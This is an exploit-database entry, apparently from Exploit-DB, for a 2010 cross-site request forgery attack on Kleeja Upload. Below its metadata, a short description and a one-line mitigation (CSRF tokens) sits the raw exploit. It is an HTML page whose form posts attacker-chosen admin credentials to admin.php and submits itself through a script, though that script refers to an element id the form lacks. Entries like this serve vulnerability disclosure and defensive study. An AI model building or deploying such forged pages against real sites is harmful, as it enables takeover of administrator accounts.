Kleeja Upload - CSRF Change Admin Password

vendor:

Kleeja Upload

by:

KOLTN & KoLtN@HoTMaiL.CoM

8,8

CVSS

HIGH

CSRF

352

CWE

Product Name: Kleeja Upload

Affected Version From: all Version

Affected Version To: all Version

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Kleeja Upload – CSRF Change Admin Password

This exploit allows an attacker to change the admin password of Kleeja software by using a CSRF attack. The attacker can craft a malicious HTML page with a form that contains the new admin credentials and submit it to the vulnerable URL. This will change the admin password and give the attacker access to the admin panel.

Mitigation:

The application should use CSRF tokens to verify the authenticity of the request.

Source

Exploit-DB raw data:

# Exploit Title: Kleeja Upload - CSRF Change Admin Password
# Date: 11-08-2010
# Author: KOLTN & KoLtN@HoTMaiL.CoM
# Software Link: http://www.kleeja.com
# Software Download: http://www.kleeja.com/download/
# Type : CSRF
# Version: all Version
# Greetz to : Juba & Mushii
#####################Exploit Change Admin Password##########################
<html>
<form method="post" action="http://localhost/kleeja/admin.php?cp=users&page=0">
<input type="text" name="nm_1" value="KoLtN"/>
<input type="text" name="ml_1" value="KoLtN@hotmail.com"/>
<input type="password" name="ps_1" value="123456"/>
<input name="ad_1" type="checkbox" checked="checked"/>
<input type="checkbox" name="del_1" value="1"/>
<input class="button2" name="submit" type="submit"/>
<script>
document.getElementById('submit').click();
</script>
</form>
</body>
</html>
#####################Exploit Change Admin Password##########################

Ramadan Kareem !!